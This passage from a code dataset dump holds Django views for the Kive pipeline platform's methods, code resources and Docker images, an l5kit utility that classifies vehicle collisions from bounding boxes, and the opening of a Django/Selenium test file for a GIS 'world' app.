request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resource_revision_add(request, pk):\n \"\"\"\n Add a code resource revision. The form will initially be populated with values of the last\n revision to this code resource.\n \"\"\"\n t = loader.get_template('method/resource_revision_add.html')\n c = {}\n creating_user = request.user\n parent_revision = CodeResourceRevision.check_accessible(pk, creating_user)\n coderesource = parent_revision.coderesource\n\n if request.method == 'POST':\n # Use forms here, just as in resource_add. 
Again note that entries of dep_forms may be None.\n revision_form = CodeResourceRevisionForm(request.POST, request.FILES)\n if not revision_form.is_valid():\n c.update({\n 'revision_form': revision_form,\n 'parent_revision': parent_revision,\n 'coderesource': coderesource\n })\n return HttpResponse(t.render(c, request))\n\n try:\n _make_crv(request.FILES.get('content_file', None), creating_user, revision_form,\n parent_revision=parent_revision)\n except ValidationError:\n # The forms have all been updated with the appropriate errors.\n c.update(\n {\n 'revision_form': revision_form,\n 'parent_revision': parent_revision,\n 'coderesource': coderesource\n })\n return HttpResponse(t.render(c, request)) # CodeResourceRevision object required for next steps\n\n # Success; return to the resources page.\n return HttpResponseRedirect('/resources')\n\n # Having reached here, we know that this CR is being revised. Return a form pre-populated\n # with default info.\n parent_users_allowed = [x.username for x in parent_revision.users_allowed.all()]\n parent_groups_allowed = [x.name for x in parent_revision.groups_allowed.all()]\n crv_form = CodeResourceRevisionForm(\n initial={\n \"permissions\": [parent_users_allowed, parent_groups_allowed]\n }\n )\n\n c.update(\n {\n 'revision_form': crv_form,\n 'parent_revision': parent_revision,\n 'coderesource': coderesource\n }\n )\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resource_revision_view(request, pk):\n revision = CodeResourceRevision.check_accessible(pk, request.user)\n addable_users, addable_groups = revision.other_users_groups()\n\n if request.method == 'POST':\n # We are attempting to update the CodeResourceRevision's metadata/permissions.\n revision_form = CodeResourceRevisionDetailsForm(\n request.POST,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=revision\n )\n\n if revision_form.is_valid():\n try:\n revision.revision_name = revision_form.cleaned_data[\"revision_name\"]\n revision.revision_desc = revision_form.cleaned_data[\"revision_desc\"]\n revision.save()\n revision.grant_from_json(revision_form.cleaned_data[\"permissions\"])\n revision.clean()\n\n # Success -- go back to the CodeResource page.\n return HttpResponseRedirect('/resource_revisions/{}'.format(revision.coderesource.pk))\n except (AttributeError, ValidationError, ValueError) as e:\n LOGGER.exception(e.message)\n revision_form.add_error(None, e)\n\n else:\n revision_form = CodeResourceRevisionDetailsForm(\n addable_users=addable_users,\n addable_groups=addable_groups,\n initial={\n \"revision_name\": revision.revision_name,\n \"revision_desc\": revision.revision_desc\n }\n )\n\n t = loader.get_template(\"method/resource_revision_view.html\")\n c = {\n \"revision\": revision,\n \"revision_form\": revision_form,\n \"is_owner\": revision.user == request.user,\n \"is_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_families(request):\n \"\"\"\n Display a list of all MethodFamily objects in database.\n \"\"\"\n t = loader.get_template(\"method/method_families.html\")\n c = {\n \"is_user_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef methods(request, pk):\n \"\"\"\n Display a list of all Methods within a given MethodFamily.\n \"\"\"\n family = MethodFamily.check_accessible(pk, request.user)\n 
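# Like resource_revisions above, this view does double duty: a POST updates the MethodFamily's metadata\n # and permissions, while a plain GET just renders the family's list of Methods.\n 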
addable_users, addable_groups = family.other_users_groups()\n\n if request.method == 'POST':\n # We are attempting to update the MethodFamily's metadata/permissions.\n mf_form = MethodFamilyForm(\n request.POST,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=family\n )\n\n if mf_form.is_valid():\n try:\n family.name = mf_form.cleaned_data[\"name\"]\n family.description = mf_form.cleaned_data[\"description\"]\n family.save()\n family.grant_from_json(mf_form.cleaned_data[\"permissions\"])\n family.clean()\n\n # Success -- go back to the resources page.\n return HttpResponseRedirect('/method_families')\n except (AttributeError, ValidationError, ValueError) as e:\n LOGGER.exception(e.message)\n mf_form.add_error(None, e)\n\n else:\n mf_form = MethodFamilyForm(\n addable_users=addable_users,\n addable_groups=addable_groups,\n initial={\"name\": family.name, \"description\": family.description}\n )\n\n t = loader.get_template('method/methods.html')\n c = {\n \"family\": family,\n \"family_form\": mf_form,\n \"is_admin\": admin_check(request.user),\n \"is_owner\": request.user == family.user\n }\n return HttpResponse(t.render(c, request))\n\n\ndef _make_dep_forms(query_dict, user):\n \"\"\"\n Helper for resource_add and resource_revision_add that creates the MethodDependencyForms.\n \"\"\"\n num_dep_forms = sum([1 for k in query_dict.keys() if k.startswith('coderesource_')])\n dep_forms = []\n for i in range(num_dep_forms):\n this_cr = query_dict['coderesource_'+str(i)] # PK of the Method\n if this_cr == '':\n # Ignore blank CR dependency forms.\n continue\n\n dep_forms.append(\n MethodDependencyForm(\n {\n 'coderesource': query_dict['coderesource_'+str(i)],\n 'revisions': query_dict['revisions_'+str(i)],\n 'path': query_dict['path_'+str(i)],\n 'filename': query_dict['filename_'+str(i)]\n },\n user=user,\n auto_id='id_%s_'+str(i)\n )\n )\n return dep_forms\n\n\ndef create_method_forms(request_post, user, family=None):\n \"\"\"\n Helper function for method_add() that creates Forms from the\n provided information and validates them.\n \"\"\"\n query_dict = request_post.dict()\n if 'name' in query_dict:\n assert family is None\n family = MethodFamily(user=user)\n family_form = MethodFamilyForm(request_post, instance=family)\n else:\n assert family is not None\n family_form = MethodFamilyForm(\n {\n \"name\": family.name,\n \"description\": family.description\n },\n instance=family\n )\n family_form.is_valid()\n\n # Populate main form with submitted values.\n if \"coderesource\" in query_dict:\n method_form = MethodForm(request_post, user=user)\n else:\n method_form = MethodReviseForm(request_post)\n method_form.is_valid()\n # Determine whether the confirm_shebang button has been clicked.\n # NOTE: confirm_shebang is a checkbox html element; according to HTML spec, it will only\n # be present iff its true. ==> we cannot rely on it being present, and set the value\n # to false if it is absent.\n has_override = (request_post.get(\"confirm_shebang\", 'off') == 'on')\n # NOTE: for shebang_val, we must differentiate between yes, no and undefined\n missing_shebang = _get_shebang_code(method_form) == SHEBANG_NO\n show_shebang_field = query_dict[\"SHOW_SHEBANG_FIELD\"] = missing_shebang\n query_dict[\"SHEBANG_OK\"] = (not missing_shebang or has_override)\n\n etxt = \"\"\"The code resource should be executable, which means that the file usually starts\nwith a shebang: '#!'. 
The currently selected code resource does not.\nIf you know what you are doing, you can override this requirement here.\"\"\"\n if show_shebang_field and not has_override:\n method_form.add_error(\"confirm_shebang\", etxt)\n\n # Populate in/output forms with submitted values.\n input_forms = []\n output_forms = []\n for xput_type, formlst in [(\"in\", input_forms), (\"out\", output_forms)]:\n num_forms = sum(k.startswith('dataset_name_{}_'.format(xput_type)) for k in query_dict)\n for i in range(num_forms):\n auto_id = \"id_%s_{}_{}\".format(xput_type, i)\n t_form = TransformationXputForm(\n {'dataset_name': query_dict['dataset_name_{}_{}'.format(xput_type, i)]},\n auto_id=auto_id)\n t_form.is_valid()\n\n xs_form = XputStructureForm(\n {'compounddatatype': query_dict['compounddatatype_{}_{}'.format(xput_type, i)],\n 'min_row': query_dict['min_row_{}_{}'.format(xput_type, i)],\n 'max_row': query_dict['max_row_{}_{}'.format(xput_type, i)]},\n user=user,\n auto_id=auto_id)\n xs_form.is_valid()\n formlst.append((t_form, xs_form))\n\n dep_forms = _make_dep_forms(request_post.dict(), user)\n # the methods must have at least one input and output each.\n if len(input_forms) == 0:\n tx_form = TransformationXputForm(auto_id='id_%s_in_0')\n xs_form = XputStructureForm(user=user, auto_id='id_%s_in_0')\n input_forms.append((tx_form, xs_form))\n if len(output_forms) == 0:\n tx_form = TransformationXputForm(auto_id='id_%s_out_0')\n xs_form = XputStructureForm(user=user, auto_id='id_%s_out_0')\n output_forms.append((tx_form, xs_form))\n\n return family_form, method_form, dep_forms, input_forms, output_forms, query_dict\n\n\nSHEBANG_YES = 1\nSHEBANG_NO = 2\nSHEBANG_UNDEF = 3\n\n\ndef _get_shebang_code(method_form):\n # Retrieve the CodeResource revision and return whether it has a #! on its first line or not.\n # This routine can return three different values:\n # SHEBANG_UNDEF: resource driver is defined\n # SHEBANG_YES, SHEBANG_NO: code resource is defined, and 'code resource has a shebang'\n # This logic is required because a form can be submitted with an empty code_resource\n # field. 
In that case, the whole form will fail, but we need to know, independently of\n # that form failing, whether we should display the 'no shebang override' button to the user.\n try:\n coderesource_revision = CodeResourceRevision.objects.get(pk=method_form.cleaned_data['driver_revisions'])\n except (KeyError, ValueError, CodeResourceRevision.DoesNotExist):\n return SHEBANG_UNDEF\n # We do have a code resource defined;\n # now check to see whether the driver code begins with a shebang\n try:\n coderesource_revision.content_file.open()\n first_line = coderesource_revision.content_file.file.readline()\n coderesource_revision.content_file.close()\n except Exception as exc:\n method_form.add_error(\"driver_revisions\", exc)\n return SHEBANG_UNDEF\n tdct = {True: SHEBANG_YES, False: SHEBANG_NO}\n return tdct[first_line.startswith(\"#!\")]\n\n\ndef create_method_from_forms(family_form, method_form, dep_forms, input_forms, output_forms, creating_user,\n family=None, parent_method=None):\n \"\"\"\n Given Forms representing the MethodFamily, Method, inputs, and outputs, create a Method.\n\n Warning: this routine has side effects (it can mod its arguments):\n If an error occurs:\n return None and update the forms with errors.\n else:\n return the new method and the forms are returned without modification.\n \"\"\"\n # This assures that not both family_form and family are None.\n assert family is not None or family_form is not None\n\n for dep_form in dep_forms:\n assert isinstance(dep_form, MethodDependencyForm) or dep_form is None\n\n # Retrieve the CodeResource revision as driver.\n try:\n coderesource_revision = CodeResourceRevision.objects.get(\n pk=method_form.cleaned_data['driver_revisions'])\n except CodeResourceRevision.DoesNotExist:\n coderesource_revision = None\n\n # Retrieve the Container.\n try:\n container = Container.objects.get(\n pk=method_form.cleaned_data['container'])\n except Container.DoesNotExist:\n container = None\n\n new_method = None\n try:\n # Note how the except blocks re-raise their exception: that is to terminate\n # this transaction.\n with transaction.atomic():\n if family is None:\n try:\n family = family_form.save()\n family.grant_from_json(method_form.cleaned_data[\"permissions\"])\n family.full_clean()\n\n except ValidationError as e:\n family_form.add_error(None, e)\n raise e\n\n new_method = Method(\n family=family,\n revision_name=method_form.cleaned_data['revision_name'],\n revision_desc=method_form.cleaned_data['revision_desc'],\n revision_parent=parent_method,\n driver=coderesource_revision,\n container=container,\n reusable=method_form.cleaned_data['reusable'],\n user=creating_user,\n threads=method_form.cleaned_data[\"threads\"],\n memory=method_form.cleaned_data[\"memory\"]\n )\n new_method.save()\n\n new_method.grant_from_json(method_form.cleaned_data[\"permissions\"])\n\n # Bind dependencies.\n for i in range(len(dep_forms)):\n if dep_forms[i] is None:\n continue\n try:\n on_revision = CodeResourceRevision.objects.get(\n pk=dep_forms[i].cleaned_data[\"revisions\"])\n dependency = MethodDependency(\n method=new_method,\n requirement=on_revision,\n path=dep_forms[i].cleaned_data[\"path\"],\n filename=dep_forms[i].cleaned_data[\"filename\"]\n )\n dependency.full_clean()\n dependency.save()\n except ValidationError as e:\n dep_forms[i].add_error(None, e)\n raise e\n\n # Attempt to make in/outputs.\n num_outputs = len(output_forms)\n if num_outputs == 0:\n method_form.add_error(None, \"You must specify at least one output.\")\n raise ValidationError(\"You must 
specify at least one output.\")\n\n for xput_type in (\"in\", \"out\"):\n curr_forms = input_forms\n if xput_type == \"out\":\n curr_forms = output_forms\n\n for form_tuple in curr_forms:\n t_form = form_tuple[0]\n xs_form = form_tuple[1]\n dataset_name = t_form.cleaned_data[\"dataset_name\"]\n cdt_id = xs_form.cleaned_data[\"compounddatatype\"]\n\n if dataset_name == '' and cdt_id == '':\n # ignore blank form\n continue\n\n my_compound_datatype = None\n min_row = None\n max_row = None\n if cdt_id != '__raw__':\n try:\n my_compound_datatype = CompoundDatatype.objects.get(pk=cdt_id)\n min_row = xs_form.cleaned_data[\"min_row\"]\n max_row = xs_form.cleaned_data[\"max_row\"]\n except (ValueError, CompoundDatatype.DoesNotExist) as e:\n xs_form.add_error(\"compounddatatype\", e)\n raise e\n\n curr_xput = new_method.create_xput(\n dataset_name=dataset_name,\n compounddatatype=my_compound_datatype,\n row_limits=(min_row, max_row),\n input=(xput_type == \"in\"),\n clean=False\n )\n\n if cdt_id != \"__raw__\":\n try:\n curr_xput.structure.clean()\n except ValidationError as e:\n xs_form.add_error(None, e)\n raise e\n\n try:\n curr_xput.clean()\n except ValidationError as e:\n t_form.add_error(None, e)\n raise e\n\n try:\n new_method.complete_clean()\n except ValidationError as e:\n method_form.add_error(None, e)\n raise e\n\n except ValidationError:\n return None\n\n return new_method\n\n\ndef _method_forms_check_valid(family_form, method_form, dep_forms,\n input_form_tuples, output_form_tuples):\n \"\"\"\n Helper that validates all forms returned from create_method_forms.\n \"\"\"\n in_xput_forms, in_struct_forms = zip(*input_form_tuples)\n out_xput_forms, out_struct_forms = zip(*output_form_tuples)\n all_forms = ([family_form] + [method_form] + dep_forms +\n list(in_xput_forms) + list(in_struct_forms) +\n list(out_xput_forms) + list(out_struct_forms))\n return all(x.is_valid() for x in all_forms)\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_view(request, pk):\n \"\"\"\n View a Method or edit its metadata/permissions.\n \"\"\"\n method = Method.check_accessible(pk, request.user)\n addable_users, addable_groups = method.other_users_groups()\n addable_users, addable_groups = method.family.intersect_permissions(\n addable_users,\n addable_groups)\n if method.revision_parent is not None:\n addable_users, addable_groups = (\n method.revision_parent.intersect_permissions(addable_users,\n addable_groups))\n if method.driver is not None:\n addable_users, addable_groups = method.driver.intersect_permissions(\n addable_users,\n addable_groups)\n if method.docker_image is not None:\n addable_users, addable_groups = (\n method.docker_image.intersect_permissions(addable_users,\n addable_groups))\n for dep in method.dependencies.all():\n addable_users, addable_groups = dep.requirement.intersect_permissions(addable_users, addable_groups)\n for xput in itertools.chain(method.inputs.all(), method.outputs.all()):\n xput_cdt = xput.get_cdt()\n if xput_cdt is not None:\n addable_users, addable_groups = xput_cdt.intersect_permissions(addable_users, addable_groups)\n\n if request.method == 'POST':\n # We are attempting to update the Method's metadata/permissions.\n method_form = MethodDetailsForm(\n request.POST,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=method\n )\n\n if method_form.is_valid():\n try:\n method.revision_name = method_form.cleaned_data[\"revision_name\"]\n method.revision_desc = method_form.cleaned_data[\"revision_desc\"]\n method.save()\n 
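# Permissions are granted only after the updated fields are saved; clean() then re-validates the Method,\n # and any ValidationError is caught below and attached to the form.\n 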
method.grant_from_json(method_form.cleaned_data[\"permissions\"])\n method.clean()\n\n # Success -- go back to the CodeResource page.\n return HttpResponseRedirect('/methods/{}'.format(method.family.pk))\n except (AttributeError, ValidationError, ValueError) as e:\n LOGGER.exception(e.message)\n method_form.add_error(None, e)\n\n else:\n method_form = MethodDetailsForm(\n addable_users=addable_users,\n addable_groups=addable_groups,\n initial={\n \"revision_name\": method.revision_name,\n \"revision_desc\": method.revision_desc\n }\n )\n\n t = loader.get_template(\"method/method_view.html\")\n c = {\n \"method\": method,\n \"method_form\": method_form,\n \"is_owner\": method.user == request.user,\n \"is_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_new(request):\n \"\"\"\n Generate/validate/process forms creating a new MethodFamily and initial Method.\n\n Allows for an arbitrary number of input and output forms.\n \"\"\"\n return _method_creation_helper(request, method_family=None)\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_add(request, pk):\n \"\"\"\n Generate/validate/process forms for adding a Method to an existing MethodFamily.\n\n Allows for an arbitrary number of input and output forms.\n\n [pk] : primary key of the MethodFamily that this Method is being added to.\n \"\"\"\n this_family = MethodFamily.check_accessible(pk, request.user)\n return _method_creation_helper(request, method_family=this_family)\n\n\ndef _method_creation_helper(request, method_family=None):\n \"\"\"\n Helper for method_new and method_add.\n\n [request]: the request that actually came in.\n [method_family]: the MethodFamily to add to if applicable, None otherwise.\n \"\"\"\n creating_user = request.user\n\n if method_family:\n header = \"Add a new Method to MethodFamily '%s'\" % method_family.name\n else:\n header = 'Start a new MethodFamily with an initial Method'\n t = loader.get_template('method/method.html')\n if request.method == 'POST':\n family_form, method_form, dep_forms,\\\n input_form_tuples, output_form_tuples,\\\n query_dict = create_method_forms(request.POST, creating_user, family=method_family)\n forms_are_valid = _method_forms_check_valid(family_form,\n method_form, dep_forms,\n input_form_tuples, output_form_tuples)\n display_shebang_button = query_dict[\"SHOW_SHEBANG_FIELD\"]\n shebang_ok = query_dict[\"SHEBANG_OK\"]\n if not (forms_are_valid and shebang_ok):\n # Bail out now if a) the forms are invalid, or we need to allow\n # the user to override a missing shebang in the driver code_resource\n if not dep_forms:\n dep_forms = [MethodDependencyForm(user=creating_user, auto_id='id_%s_0')]\n c = {'show_shebang_button': display_shebang_button,\n 'family_form': family_form,\n 'method_form': method_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': method_family,\n 'header': header,\n 'docker_default': DockerImage.DEFAULT_IMAGE}\n return HttpResponse(t.render(c, request))\n else:\n # We are happy with the input, now attempt to build the Method and\n # its associated MethodFamily (if necessary), inputs, and outputs.\n just_created = create_method_from_forms(family_form, method_form,\n dep_forms, input_form_tuples,\n output_form_tuples, creating_user,\n family=method_family)\n if just_created is None:\n # creation failed: the forms have been modded by create_method_from_forms\n # so just show the user 
these.\n if not dep_forms:\n dep_forms = [MethodDependencyForm(user=creating_user, auto_id='id_%s_0')]\n c = {'show_shebang_button': display_shebang_button,\n 'family_form': family_form,\n 'method_form': method_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': method_family,\n 'header': header + \": ERROR\",\n 'docker_default': DockerImage.DEFAULT_IMAGE}\n return HttpResponse(t.render(c, request))\n else:\n # Success!\n return HttpResponseRedirect('/methods/{}'.format(just_created.family.pk), request)\n else:\n # not a POST: Just prepare a blank set of forms for rendering.\n family_form = MethodFamilyForm()\n method_form = MethodForm(user=creating_user)\n\n dep_forms = [MethodDependencyForm(user=creating_user, auto_id='id_%s_0')]\n input_form_tuples = [\n (TransformationXputForm(auto_id='id_%s_in_0'),\n XputStructureForm(user=creating_user, auto_id='id_%s_in_0'))\n ]\n output_form_tuples = [\n (TransformationXputForm(auto_id='id_%s_out_0'),\n XputStructureForm(user=creating_user, auto_id='id_%s_out_0'))\n ]\n c = {'show_shebang_button': False,\n 'family_form': family_form,\n 'method_form': method_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': method_family,\n 'header': header,\n 'docker_default': DockerImage.DEFAULT_IMAGE}\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_revise(request, pk):\n \"\"\"\n Add a revision of an existing Method. revision_parent is defined by the\n previous version.\n \"\"\"\n t = loader.get_template('method/method.html')\n c = {}\n creating_user = request.user\n\n # Retrieve the most recent member of this Method's family.\n parent_method = Method.check_accessible(pk, creating_user)\n family = parent_method.family\n\n # Retrieve the most recent revision of the corresponding CR.\n parent_revision = parent_method.driver\n if not parent_revision:\n this_code_resource = None\n all_revisions = []\n else:\n this_code_resource = parent_revision.coderesource\n # Filter the available revisions by user.\n all_revisions = CodeResourceRevision.filter_by_user(\n creating_user,\n queryset=this_code_resource.revisions.all()).order_by('-revision_DateTime')\n\n parent_container = parent_method.container\n if not parent_container:\n this_container_family = None\n all_containers = []\n else:\n this_container_family = parent_container.family\n all_containers = Container.filter_by_user(\n creating_user,\n queryset=this_container_family.containers.all())\n\n if request.method == 'POST':\n # Because there is no CodeResource specified, the second value is of type MethodReviseForm.\n family_form, method_revise_form,\\\n dep_forms, input_form_tuples,\\\n output_form_tuples, _ = create_method_forms(request.POST, creating_user, family=family)\n if not _method_forms_check_valid(family_form, method_revise_form, dep_forms,\n input_form_tuples, output_form_tuples):\n # Bail out now if there are any problems.\n c.update(\n {\n 'coderesource': this_code_resource,\n 'containerfamily': this_container_family,\n 'method_revise_form': method_revise_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': family,\n 'family_form': family_form,\n 'parent': parent_method,\n 'docker_default': DockerImage.DEFAULT_IMAGE\n })\n return HttpResponse(t.render(c, request))\n\n # Next, attempt to build the Method and add it to family.\n 
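# create_method_from_forms signals failure by attaching errors to the forms (and returning None)\n # rather than raising, so the forms are re-checked below before deciding whether to redirect.\n 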
create_method_from_forms(\n family_form, method_revise_form, dep_forms, input_form_tuples, output_form_tuples, creating_user,\n family=family, parent_method=parent_method\n )\n if _method_forms_check_valid(family_form, method_revise_form, dep_forms,\n input_form_tuples, output_form_tuples):\n # Success!\n return HttpResponseRedirect('/methods/{}'.format(family.pk))\n\n else:\n # Initialize forms with values of parent Method.\n family_form = MethodFamilyForm({\"name\": family.name, \"description\": family.description})\n parent_users_allowed = [x.username for x in parent_method.users_allowed.all()]\n parent_groups_allowed = [x.name for x in parent_method.groups_allowed.all()]\n method_revise_form = MethodReviseForm(\n initial={\n \"revision_desc\": parent_method.revision_desc,\n \"driver_revisions\": parent_revision and parent_revision.pk,\n \"docker_image\": parent_method.docker_image_id,\n \"reusable\": parent_method.reusable,\n \"threads\": parent_method.threads,\n \"memory\": parent_method.memory,\n \"permissions\": [parent_users_allowed, parent_groups_allowed]\n })\n\n dependencies = parent_method.dependencies.all()\n dep_forms = []\n for i, dependency in enumerate(dependencies):\n its_crv = dependency.requirement\n its_cr = its_crv.coderesource\n dep_form = MethodDependencyForm(\n user=creating_user,\n auto_id='id_%s_'+str(i),\n initial={\n 'coderesource': its_cr.pk,\n 'revisions': its_crv.pk,\n 'path': dependency.path,\n 'filename': dependency.filename\n }\n )\n dep_forms.append(dep_form)\n # If the parent Method has no dependencies, add a blank form.\n if len(dep_forms) == 0:\n dep_forms.append(MethodDependencyForm(user=creating_user, auto_id='id_%s_0'))\n\n xput_forms = []\n inputs = parent_method.inputs.order_by(\"dataset_idx\")\n outputs = parent_method.outputs.order_by(\"dataset_idx\")\n for xput_type, xputs in ((\"in\", inputs), (\"out\", outputs)):\n forms = []\n for xput in xputs:\n tx_form = TransformationXputForm(auto_id='id_%s_{}_{}'.format(xput_type, len(forms)),\n initial={'dataset_name': xput.dataset_name,\n 'dataset_idx': xput.dataset_idx})\n if xput.has_structure:\n structure = xput.structure\n xs_form = XputStructureForm(user=creating_user,\n auto_id='id_%s_{}_{}'.format(xput_type, len(forms)),\n initial={'compounddatatype': structure.compounddatatype.id,\n 'min_row': structure.min_row,\n 'max_row': structure.max_row})\n else:\n xs_form = XputStructureForm(user=creating_user,\n auto_id='id_%s_{}_{}'.format(xput_type, len(forms)),\n initial={'compounddatatype': '__raw__'})\n\n forms.append((tx_form, xs_form))\n xput_forms.append(forms)\n\n input_form_tuples, output_form_tuples = xput_forms\n # if previous Method has no inputs, provide blank forms\n if len(input_form_tuples) == 0:\n tx_form = TransformationXputForm(auto_id='id_%s_in_0')\n xs_form = XputStructureForm(user=creating_user, auto_id='id_%s_in_0')\n input_form_tuples.append((tx_form, xs_form))\n\n method_revise_form.fields['driver_revisions'].widget.choices = [\n (str(x.id), '{}: {}'.format(x.revision_number, x.revision_name)) for x in all_revisions\n ]\n method_revise_form.fields['container'].widget.choices = [\n (str(x.id), x.tag) for x in all_containers]\n c.update(\n {\n 'coderesource': this_code_resource,\n 'containerfamily': this_container_family,\n 'method_form': method_revise_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': family,\n 'family_form': family_form,\n 'parent': parent_method,\n 'docker_default': 
DockerImage.DEFAULT_IMAGE\n }\n )\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef docker_images(request):\n \"\"\"\n Display a list of all MethodFamily objects in database.\n \"\"\"\n t = loader.get_template(\"method/docker_images.html\")\n c = {\n \"is_user_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef docker_image_add(request):\n if request.method != 'POST':\n image_form = DockerImageForm()\n else:\n image = DockerImage(user=request.user)\n image_form = DockerImageForm(request.POST, instance=image)\n\n try:\n if image_form.is_valid():\n image.build()\n image_form.save()\n image.grant_from_json(image_form.cleaned_data[\"permissions\"])\n\n return HttpResponseRedirect('/docker_images')\n except CalledProcessError as ex:\n image_form.add_error(None, ex.output)\n except ValueError:\n # All forms have the appropriate errors attached.\n pass\n\n t = loader.get_template('method/docker_image_add.html')\n c = {\n 'image_form': image_form,\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef docker_image_view(request, image_id):\n image = DockerImage.check_accessible(image_id, request.user)\n\n addable_users, addable_groups = image.other_users_groups()\n\n image_form = DockerImageForm(\n request.POST if request.method == 'POST' else None,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=image)\n for field in ('name', 'tag', 'git'):\n image_form.fields[field].disabled = True\n\n if request.method == 'POST':\n try:\n image_form.save()\n image.grant_from_json(image_form.cleaned_data[\"permissions\"])\n return HttpResponseRedirect('/docker_images')\n except ValueError:\n # Form has errors attached.\n pass\n\n t = loader.get_template(\"method/docker_image_view.html\")\n c = {\n \"docker_image\": image,\n \"docker_image_form\": image_form,\n \"is_owner\": image.user == request.user,\n \"is_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n","sub_path":"kive/method/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":44213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"634451583","text":"from typing import Tuple\n\nimport numpy as np\nfrom shapely.geometry import LineString, Polygon\n\n\ndef _get_boundingbox(centroid: np.ndarray, yaw: float, extent: np.ndarray) -> Polygon:\n x, y = centroid[0], centroid[1]\n sin, cos = np.sin(yaw), np.cos(yaw)\n width, length = extent[0] / 2, extent[1] / 2\n\n x1, y1 = (x + width * cos - length * sin, y + width * sin + length * cos)\n x2, y2 = (x + width * cos + length * sin, y + width * sin - length * cos)\n x3, y3 = (x - width * cos + length * sin, y - width * sin - length * cos)\n x4, y4 = (x - width * cos - length * sin, y - width * sin + length * cos)\n return Polygon([[x1, y1], [x2, y2], [x3, y3], [x4, y4]])\n\n\ndef _get_sides(bbox: Polygon) -> Tuple[LineString, LineString, LineString, LineString]:\n (x1, y1), (x2, y2), (x3, y3), (x4, y4) = bbox.exterior.coords[:-1]\n return (\n LineString([(x1, y1), (x2, y2)]),\n LineString([(x3, y3), (x4, y4)]),\n LineString([(x1, y1), (x4, y4)]),\n LineString([(x2, y2), (x3, y3)]),\n )\n\n\ndef within_range(ego_centroid: np.ndarray, ego_extent: np.ndarray, agents: np.ndarray) -> np.ndarray:\n agent_centroids = agents[\"centroid\"]\n agent_extents = agents[\"extent\"]\n distance = 
np.linalg.norm(ego_centroid - agent_centroids, axis=-1)\n max_range = 0.5 * (np.linalg.norm(ego_extent[:2]) + np.linalg.norm(agent_extents[:, 2], axis=-1))\n return agents[distance < max_range]\n\n\ndef detect_collision(\n pred_centroid: np.ndarray, pred_yaw: float, pred_extent: np.ndarray, target_agents: np.ndarray\n) -> Tuple[str, str]:\n \"\"\"\n Computes whether a collision occurred between ego and any another agent.\n Also computes the type of collision: rear, front, or side.\n For this, we compute the intersection of ego's four sides with a target\n agent and measure the length of this intersection. A collision\n is classified into a class, if the corresponding length is maximal,\n i.e. a front collision exhibits the longest intersection with\n egos front edge.\n \"\"\"\n ego_bbox = _get_boundingbox(centroid=pred_centroid, yaw=pred_yaw, extent=pred_extent)\n for agent in within_range(pred_centroid, pred_extent, target_agents):\n agent_bbox = _get_boundingbox(agent[\"centroid\"], agent[\"yaw\"], agent[\"extent\"])\n\n if ego_bbox.intersects(agent_bbox):\n front_side, rear_side, left_side, right_side = _get_sides(ego_bbox)\n\n intersection_length_per_side = np.asarray(\n [\n agent_bbox.intersection(front_side).length,\n agent_bbox.intersection(rear_side).length,\n agent_bbox.intersection(left_side).length,\n agent_bbox.intersection(right_side).length,\n ]\n )\n collision_type = [\"front\", \"rear\", \"side\", \"side\"][np.argmax(intersection_length_per_side)]\n return collision_type, agent[\"track_id\"]\n return \"\", \"\"\n","sub_path":"l5kit/l5kit/planning/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"502044732","text":"from django.test import TestCase\nfrom world.models import WorldBorder, UserMap, CountryList\nfrom django.core.urlresolvers import reverse\nfrom world.forms import CountryForm, UserMapForm, MapFormSet, CountryEditForm\nfrom selenium import webdriver\nfrom django.test import LiveServerTestCase\nfrom django.contrib.auth.models import User\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\nfrom selenium.webdriver.support.ui import Select\n\n# For tests to be run must create\n# superuser: admin password: testpassword\n# map: testMap\n# firefox installed\n\n\n# Tests on WorldBorder model\nclass WorldBorderTests(TestCase):\n\n # Function to create border entry\n def create_border(self, name=\"testBorder\", area=1, pop2005=\"1\",fips=\"a\",iso2=\"a\",iso3=\"a\",un=\"1\",region=\"1\",subregion=\"1\",lon=\"1\",lat=\"1\", objects=\"2\"):\n return WorldBorder.objects.create(name=name,area=area,pop2005=pop2005,fips=fips,iso2=iso2,iso3=iso3,un=un,region=region,subregion=subregion,lon=lon,lat=lat)\n\n # Tests border creation\n def test_border_creation(self):\n test = self.create_border()\n 